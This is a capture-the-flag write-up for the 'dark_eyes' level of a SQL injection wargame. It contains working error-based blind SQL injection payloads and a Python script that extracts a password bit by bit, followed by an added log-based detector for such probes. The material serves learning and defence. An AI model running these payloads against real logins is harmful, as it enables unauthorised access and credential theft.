# \[Lord Of Sqlinjection] dark\_eyes

<figure><img src="https://blog.kakaocdn.net/dna/qKdfT/btsNCd4Vq1P/AAAAAAAAAAAAAAAAAAAAAOpdii_jAJV5t06gJeJCq0yi7Itoe5csrvz621VdkXHj/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Zh9fR5M%2BTD5%2B8%2Bk08pG3kca2bxQ%3D" alt="" height="336" width="659"><figcaption></figcaption></figure>

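* Borrow the approach used to solve the iron\_golem challenge
  * It can be solved using `select 1 union select 2`
  * Because `if` is filtered, this construct lets us infer a condition from whether the query raises an error or runs normally
  * Query runs normally → the original page is displayed
  * Query fails → a blank page is displayed
  * First, use the `length` function to find the length of the password.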

```
[domain address]?pw=' or id ='admin' and (select 1 union select 2 where !(length(pw)<10)) %23
```

<figure><img src="https://blog.kakaocdn.net/dna/bmr0iJ/btsNAUFmwBS/AAAAAAAAAAAAAAAAAAAAAN5-8IQq7Hw8mhb4JE3k_vW8O-4UK938CDIq7V8qs0qI/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=caoBN6yU0dHcsVFX%2Fxr8ydsH9FY%3D" alt="" height="454" width="948"><figcaption></figcaption></figure>

-> This shows that the length of pw is less than 10.

(If the length of pw were greater than 10, an error would occur and exit() would be executed.)

#### Finding the password

```
import requests
import urllib3

# TLS verification is disabled below, so silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'Cookie': 'PHPSESSID=<your session ID>'}
URL = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?"

pw_length = 8    # password length
bit_length = 16  # each character is read as a 16-bit value
pw = ''

print("\n=== Find Password ===\n")

for i in range(1, pw_length+1):
    bit = ''

    for j in range(1, bit_length+1):
        # If bit j of character i is 1, the first subquery returns 'admin' and the page renders.
        # Otherwise coalesce() falls through to (select 1 union select 2), which raises an error.
        payload = "pw=' or (select id where id='admin')=coalesce((select id where id='admin' and substr(lpad(bin(ord(substr(pw,{},1))),{},0),{},1)=1),(select 1 union select 2))%23".format(i, bit_length, j)
        res = requests.get(url=URL+payload, headers=headers, verify=False)

        if 'query' in res.text:
            # Normal page -> bit == 1
            bit += '1'
        else:
            # Error occurred -> bit == 0
            bit += '0'

    pw += chr(int(bit, 2))
    print("pw (count %02d): %s (bit: %s, hex: %s)" % (i, chr(int(bit, 2)), bit, hex(int(bit, 2))))

print('\n>>> Final Password: %s' % pw)
```

-> Running this program in VS Code shows that the pw is 5a2f5d3c.

<figure><img src="https://blog.kakaocdn.net/dna/bhqZLl/btsNDluwjZN/AAAAAAAAAAAAAAAAAAAAAAA_d35hp_m8KPHkzt3epbYllO7ihwja5ZxA8hKrPJvU/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=W8UaMYhCL8JMuG5KITOvClFybtQ%3D" alt="" height="421" width="640"><figcaption></figcaption></figure>

```
[domain address]?pw=5a2f5d3c
```
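From the defender's side, the script above leaves a recognizable trace: one client sends the same SQL-bearing `pw` value many times, changing only the numeric indices. The following is an added example (not part of the original write-up) that flags this pattern in an access log; the log format, the path `/chall/dark_eyes.php`, the IP addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, quote

# SQL fragments that appear in the payloads on this page.
SQL_TOKENS = re.compile(r"union\s+select|substr\s*\(|coalesce\s*\(|length\s*\(", re.I)

def template(value):
    """Collapse digit runs and whitespace so probes differing only in indices match."""
    return re.sub(r"\s+", " ", re.sub(r"\d+", "N", value.lower())).strip()

def find_blind_sqli(log_lines, param="pw", threshold=8):
    """Return {(client, path): count} for clients repeating one SQL-bearing template."""
    hits = Counter()
    for line in log_lines:
        fields = line.split(" ", 3)  # assumed format: "<client> <method> <url> <status>"
        if len(fields) != 4:
            continue                 # skip malformed lines
        client, _method, url, _status = fields
        parts = urlsplit(url)
        for value in parse_qs(parts.query).get(param, []):
            if SQL_TOKENS.search(value):
                hits[(client, parts.path, template(value))] += 1
    flagged = Counter()
    for (client, path, _tpl), count in hits.items():
        if count >= threshold:       # a single odd request is not enough to alert
            flagged[(client, path)] += count
    return dict(flagged)

def sample_log():
    """Constructed sample: 16 probes shaped like this page's payload, plus other traffic."""
    probe = "' or id='admin' and substr(lpad(bin(ord(substr(pw,{},1))),16,0),{},1)=1#"
    base = " GET /chall/dark_eyes.php?pw="
    lines = ["203.0.113.7" + base + quote(probe.format(1, j)) + " 200"
             for j in range(1, 17)]
    lines += ["198.51.100.4" + base + quote(guess) + " 200"
              for guess in ("hunter2", "letmein", "select")]
    lines.append("198.51.100.9" + base + quote("' union select 1#") + " 200")
    return lines

if __name__ == "__main__":
    for (client, path), count in find_blind_sqli(sample_log()).items():
        print("%s sent %d templated SQL probes to %s" % (client, count, path))
```

Grouping by template rather than by raw value is what makes the per-bit probes collapse into one countable signature.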
